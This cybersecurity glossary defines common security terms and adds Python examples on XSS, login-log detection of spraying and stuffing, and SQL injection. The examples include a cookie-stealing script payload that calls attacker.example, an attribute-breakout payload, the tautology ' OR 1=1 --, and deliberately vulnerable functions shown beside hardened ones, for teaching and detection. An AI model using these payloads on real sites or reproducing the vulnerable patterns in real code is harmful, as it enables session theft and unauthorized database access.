Cyber Glossary
Stumped by cybersecurity jargon? Enhance your security literacy with our comprehensive guide to key terms and concepts.
A
Advanced Persistent Threat (APT)
A sophisticated, targeted cyberattack in which an attacker gains unauthorized access to a network and remains undetected for an extended period.
Asset Discovery
The process of identifying and inventorying all hardware, software, and other assets present in an organization's network environment, including the ones nobody is tracking.
Attack Surface
The sum of all possible points (vectors) where an unauthorized user can try to enter or extract data from an environment.
C
Cloud Security Posture Management (CSPM)
A set of security tools and practices designed to identify and remediate risks across cloud infrastructures.
Cross-Site Scripting (XSS)
A security vulnerability that allows an attacker to inject malicious client-side scripts into web pages viewed by other users.
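The two renderers below, added here as an illustration and not part of the original glossary, show the vulnerable pattern (untrusted text concatenated into HTML) beside its hardened form, and also the less obvious case where escaping alone is not enough: an unquoted attribute, where a space in the value starts a new attribute. The comment text, the attribute payload and the attacker.example host are constructed sample input; the executable_markup helper uses Python's html.parser to tokenize the result the way a browser would and report any <script> tag or on* event-handler attribute that survived.

```python
import html
from html.parser import HTMLParser

# Constructed inputs (not from any real incident): a comment body carrying a
# script payload, and an attribute value that breaks out of an unquoted attribute.
USER_COMMENT = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = "x onmouseover=alert(1)"


def render_comment_vulnerable(comment: str) -> str:
    """Vulnerable: untrusted input is concatenated straight into the HTML body."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """Hardened: encode for the HTML text context before embedding."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def render_title_unquoted(value: str) -> str:
    """Still vulnerable: escaping does not help inside an unquoted attribute,
    because a space ends the attribute and the rest becomes a new one."""
    return f"<a title={html.escape(value, quote=True)}>link</a>"


def render_title_quoted(value: str) -> str:
    """Hardened: quote the attribute AND escape quotes inside the value."""
    return f'<a title="{html.escape(value, quote=True)}">link</a>'


class _MarkupCollector(HTMLParser):
    """Collects tag names and attribute names the way a browser would tokenize them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list = []
        self.attr_names: set = set()

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_names.update(name for name, _ in attrs)


def executable_markup(rendered: str) -> set:
    """Return the script-capable constructs in rendered HTML: <script> tags and on* event handlers."""
    collector = _MarkupCollector()
    collector.feed(rendered)
    found = set()
    if "script" in collector.tags:
        found.add("script")
    found.update(name for name in collector.attr_names if name.startswith("on"))
    return found


if __name__ == "__main__":
    for name, page in [
        ("comment, vulnerable", render_comment_vulnerable(USER_COMMENT)),
        ("comment, escaped", render_comment_safe(USER_COMMENT)),
        ("attribute, unquoted", render_title_unquoted(ATTR_PAYLOAD)),
        ("attribute, quoted", render_title_quoted(ATTR_PAYLOAD)),
    ]:
        print(f"{name:22s} executable: {executable_markup(page) or 'none'}")
```

The point of the attribute case is that output encoding is context-specific: html.escape is correct for HTML text and for quoted attribute values, but not for unquoted attributes, JavaScript string literals, or URLs, each of which needs its own encoder. A Content Security Policy is the defence-in-depth layer for whatever the encoder misses.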
Command and Control (C2)
Infrastructure used by attackers to communicate with and issue instructions to compromised systems or malware.
Common Vulnerabilities and Exposures (CVE)
A publicly listed record of a known cybersecurity vulnerability, each assigned a unique identifier of the form CVE-YYYY-NNNNN, such as CVE-2024-12345.
Common Vulnerability Scoring System (CVSS)
An open framework for communicating the characteristics and severity of software vulnerabilities on a scale from 0.0 to 10.0.
Credential Stuffing
An automated attack in which stolen username and password combinations are tested against multiple services to gain unauthorized access.
Cryptojacking
The unauthorized use of a victim's computing resources to mine cryptocurrency without their knowledge.
Cyber Kill Chain
A framework developed by Lockheed Martin that describes the stages of a cyberattack: reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives (such as data exfiltration).
D
Denial of Service (DoS)
An attack meant to shut down a machine or network, making it inaccessible to its intended users.
Data Exfiltration
The unauthorized transfer of data from an organization's systems to an external destination controlled by an attacker.
Data Loss Prevention (DLP)
A set of technologies and policies that prevent sensitive data from leaving an organization's control through unauthorized channels.
DevSecOps
A software development approach that integrates security practices into every phase of the development and operations lifecycle.
Dynamic Application Security Testing (DAST)
A black-box testing method that evaluates a running application from the outside by simulating real-world attacks.
I
Identity and Access Management (IAM)
A framework of policies and technologies that ensures the right individuals can access the right resources at the right times for the right reasons.
Incident Response
The structured approach an organization uses to prepare for, detect, contain, and recover from a cybersecurity incident.
Intrusion Detection System (IDS)
A security tool that monitors network traffic or system activity for malicious behavior and alerts administrators when suspicious activity is detected.
Intrusion Prevention System (IPS)
An inline network security tool that monitors traffic and actively blocks or drops malicious packets in real time, rather than only alerting as an IDS does.
IoT Security
The practice of securing Internet of Things devices and the networks they connect to against unauthorized access and cyberattacks.
M
Malware
Any software intentionally designed to cause disruption to a computer, server, client, or network, or to gain unauthorized access to information.
Man-in-the-Middle Attack (MitM)
An attack in which an adversary secretly intercepts and potentially alters communications between two parties who believe they are communicating directly.
MITRE ATT&CK
A globally accessible knowledge base of adversary tactics and techniques based on real-world observations of cyberattacks.
Multi-Factor Authentication (MFA)
An authentication method that requires users to provide two or more verification factors from different categories (something you know, something you have, something you are) before granting access to a system or application.
N
Network Access Control (NAC)
A security approach that enforces policy-driven access to a network based on the identity and health of connecting devices.
Network Segmentation
The practice of dividing a computer network into smaller subnetworks to contain security breaches and limit the blast radius of attacks.
P
Password Spraying
An attack that attempts a small number of commonly used passwords against a large number of accounts to avoid triggering account lockout mechanisms.
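Credential stuffing (defined under C above) and password spraying leave the same footprint in authentication logs: many distinct accounts, one or two failures each, from one source in a short window, sometimes ending in a success. What differs is the password list (leaked username/password pairs versus one common password), and the password is not in the log, so a detector can flag the pattern but not tell the two apart. The script below is an added example, not code from the glossary, and runs over constructed log lines in an assumed `src= user= result=` format with documentation-range IP addresses; it separates that "many accounts, few tries each" pattern from classic brute force ("one account, many tries"), which is what account lockout thresholds are tuned to catch.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Assumed log format for this example; adapt the regex to your identity provider's events.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) auth src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAIL)$"
)

# Constructed sample log (not real data): one spraying/stuffing source that eventually
# lands a valid credential, one brute-forcing source, and one user who mistyped once.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z auth src=203.0.113.10 user=alice result=FAIL
2024-05-01T10:00:03Z auth src=203.0.113.10 user=bob result=FAIL
2024-05-01T10:00:05Z auth src=203.0.113.10 user=carol result=FAIL
2024-05-01T10:00:07Z auth src=203.0.113.10 user=dave result=FAIL
2024-05-01T10:00:09Z auth src=203.0.113.10 user=erin result=FAIL
2024-05-01T10:00:11Z auth src=203.0.113.10 user=frank result=SUCCESS
2024-05-01T10:01:00Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:01:02Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:01:04Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:01:06Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:01:08Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:01:10Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:01:12Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:01:14Z auth src=198.51.100.7 user=admin result=FAIL
2024-05-01T10:02:00Z auth src=192.0.2.5 user=alice result=FAIL
2024-05-01T10:02:10Z auth src=192.0.2.5 user=alice result=SUCCESS
"""


def parse(log: str) -> list:
    """Return (timestamp, src, user, result) tuples; malformed lines are skipped."""
    events = []
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, m["src"], m["user"], m["result"]))
    return events


def classify_sources(log: str, window_seconds: int = 600, min_accounts: int = 5,
                     max_per_account: int = 2, min_bruteforce: int = 6) -> dict:
    """Map each suspicious source IP to a verdict, per fixed time window.

    spray_or_stuffing: >= min_accounts distinct accounts failed, none more than
                       max_per_account times (low-and-slow per account, wide across accounts).
    brute_force:       a single account failed >= min_bruteforce times.
    A '+success' suffix means the source also logged a successful login in the window.
    """
    buckets = defaultdict(list)
    for ts, src, user, result in parse(log):
        buckets[(src, int(ts.timestamp()) // window_seconds)].append((user, result))

    findings = {}
    for (src, _), attempts in buckets.items():
        fails_per_user = defaultdict(int)
        for user, result in attempts:
            if result == "FAIL":
                fails_per_user[user] += 1
        if not fails_per_user:
            continue
        succeeded = any(r == "SUCCESS" for _, r in attempts)
        worst = max(fails_per_user.values())
        if len(fails_per_user) >= min_accounts and worst <= max_per_account:
            findings[src] = "spray_or_stuffing" + ("+success" if succeeded else "")
        elif worst >= min_bruteforce:
            findings[src] = "brute_force" + ("+success" if succeeded else "")
    return findings


if __name__ == "__main__":
    for src, verdict in classify_sources(SAMPLE_LOG).items():
        print(f"{src:15s} {verdict}")
```

Keying on the source IP is the weak point: a distributed attack that rotates through a proxy pool never crosses the per-source threshold, so production detectors also aggregate tenant-wide (distinct accounts failing per minute across all sources) and compare against a baseline.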
Patch Management
The systematic process of acquiring, testing, and applying updates to software, operating systems, and firmware to correct vulnerabilities and bugs.
Penetration Testing
An authorized simulated cyberattack on a computer system, network, or application performed to evaluate its security.
Phishing
A social engineering attack that uses deceptive emails, messages, or websites to trick users into revealing credentials or installing malware.
Privilege Escalation
The act of exploiting a vulnerability or misconfiguration to gain elevated access rights beyond what was originally granted.
Public Key Infrastructure (PKI)
A framework of roles, policies, and technologies used to create, manage, and revoke digital certificates that enable secure communications.
R
Ransomware
A type of malware that encrypts a victim's files or systems and demands payment in exchange for the decryption key.
Role-Based Access Control (RBAC)
An access control model that grants permissions to users based on their role within an organization rather than their individual identity.
S
Security Awareness Training
Educational programs designed to teach employees how to recognize and respond to cybersecurity threats, particularly social engineering and phishing attacks.
Security Information and Event Management (SIEM)
A platform that aggregates, correlates, and analyzes log data from across an organization's IT environment to detect threats and support compliance.
Security Operations Center (SOC)
A centralized team of security professionals responsible for continuously monitoring, detecting, and responding to cybersecurity threats.
Security Orchestration, Automation and Response (SOAR)
A category of security software that allows organizations to automate repetitive security tasks and coordinate responses across different tools and teams.
Social Engineering
Psychological manipulation of people into performing actions or divulging confidential information, bypassing technical security controls.
Spear Phishing
A targeted form of phishing that uses personalized information about a specific individual or organization to craft more convincing deceptive messages.
SQL Injection
A web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
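The classic case is a login query built by string concatenation; the pair of functions below, added as an illustration and not code from the glossary's authors, shows it beside the parameterized form against a constructed in-memory SQLite table. The tautology payload `' OR 1=1 --` turns the WHERE clause into "everything, and ignore the rest of the line" in the vulnerable version, while the bound-parameter version treats the same bytes as a username that simply does not exist. Comparing a stored hash in the query is a simplification to keep the bypass visible; real code fetches the stored hash for the username and verifies it with a password-hashing library.

```python
import sqlite3

# Constructed in-memory database with one account (not real data).
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
DB.execute("INSERT INTO users VALUES ('alice', 'hash-of-correct-password')")
DB.commit()

INJECTION = "' OR 1=1 --"  # tautology, then a SQL comment swallows the password check


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Vulnerable: untrusted input is spliced into the SQL text, so it is parsed as SQL."""
    query = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Hardened: parameterized query; the driver binds input as data, never as SQL syntax."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone()[0] > 0


def rendered_vulnerable_query(username: str, password_hash: str) -> str:
    """What the database actually receives from login_vulnerable, for inspection."""
    return f"SELECT COUNT(*) FROM users WHERE username = '{username}' AND password_hash = '{password_hash}'"


if __name__ == "__main__":
    print("query sent:", rendered_vulnerable_query(INJECTION, "wrong"))
    print("vulnerable login with injection:", login_vulnerable(DB, INJECTION, "wrong"))
    print("parameterized login with injection:", login_safe(DB, INJECTION, "wrong"))
```

Parameterization fixes the query-structure problem but not everything: table and column names cannot be bound and must come from an allow-list, and the injected `--` only works because the comment syntax exists in SQLite and most other dialects, which is why WAF signatures alone are a weak defence.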
Static Application Security Testing (SAST)
A white-box testing method that analyzes application source code, bytecode, or binaries for security vulnerabilities without executing the program.
Supply Chain Attack
An attack that targets less-secure elements in the supply chain — such as third-party software vendors or build systems — to compromise downstream customers.
T
Threat Hunting
The proactive, human-led search for threats that have evaded automated security controls and are already present within a network.
Threat Intelligence
Evidence-based knowledge about cyber threats, including context, mechanisms, indicators of compromise, and actionable recommendations.
Transport Layer Security (TLS)
A cryptographic protocol that provides secure communication over a computer network, most commonly used to encrypt HTTPS web traffic.
V
Virtual Private Network (VPN)
A technology that creates an encrypted tunnel between a user's device and a remote server, securing data in transit and masking the user's IP address.
Vulnerability Management
The continuous practice of identifying, classifying, prioritizing, remediating, and verifying security vulnerabilities in an organization's systems.
Vulnerability Scanning
The automated process of probing systems, applications, and networks to identify known security weaknesses and misconfigurations.
Z
Zero-Day Vulnerability
A software security flaw that is unknown to the vendor, or for which no patch or fix is yet available, and which attackers may exploit before a fix exists; the name refers to the vendor having had zero days to respond.
Zero Trust Architecture
A security model based on the principle of "never trust, always verify" — requiring continuous authentication and authorization for all users, devices, and connections regardless of network location.